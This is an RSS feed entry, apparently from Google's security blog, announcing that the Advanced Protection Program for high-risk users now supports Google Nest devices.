<content:encoded><![CDATA[<span class="byline-author">Posted by Shuvo Chatterjee, Product Manager, Advanced Protection Program</span><br><br>The <a href="http://g.co/advancedprotection">Advanced Protection Program</a> is our strongest level of Google Account security for people at high risk of targeted online attacks, such as journalists, activists, business leaders, and people working on elections. Anyone can sign up to automatically receive extra safeguards against phishing, malware, and fraudulent access to their data.<br><br>Since we launched, one of our goals has been to bring Advanced Protection’s features to other Google products. Over the years, we’ve incorporated many of them into <a href="https://cloud.google.com/blog/products/identity-security/new-protections-for-users-data-and-apps-in-the-cloud">GSuite</a>, <a href="https://cloud.google.com/blog/products/identity-security/new-protections-for-users-data-and-apps-in-the-cloud">Google Cloud Platform</a>, <a href="https://blog.google/technology/safety-security/advanced-protection-program-expands-chrome/">Chrome</a>, and most recently, <a href="https://www.blog.google/products/android/new-malware-protections-advanced-protection-users/">Android</a>. We want as many users as possible to benefit from the additional levels of security that the Program provides.<br><br>Today we’re announcing one of the top requests we’ve received: to bring the Advanced Protection Program to Nest.  Now people can seamlessly use their Google Accounts with both Advanced Protection and Google Nest devices -- previously, a user could use their Google Account on only one of these at a time.<br><br>Feeling safe at home has never been more important and Nest has <a href="https://www.blog.google/products/google-nest/security-nest-accounts-safer-internet-day/">announced a variety of new security features this year</a>, including using reCAPTCHA Enterprise, to significantly lower the likelihood of automated attacks. Today’s improvement adds yet another layer of protection for people with Nest devices.<br><br>For more information about using Advanced Protection with Google Nest devices, check out <a href="https://support.google.com/accounts?p=app-nest">this article in our help center</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/GoogleOnlineSecurityBlog?a=-yh2AncXPf4:WWuRv6nONPk:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/GoogleOnlineSecurityBlog?d=yIl2AUoC8zA" border="0"></a> <a href="http://feeds.feedburner.com/~ff/GoogleOnlineSecurityBlog?a=-yh2AncXPf4:WWuRv6nONPk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/GoogleOnlineSecurityBlog?i=-yh2AncXPf4:WWuRv6nONPk:V_sGLiPBpWU" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/GoogleOnlineSecurityBlog/~4/-yh2AncXPf4" height="1" width="1" alt="">]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 1,86ms -->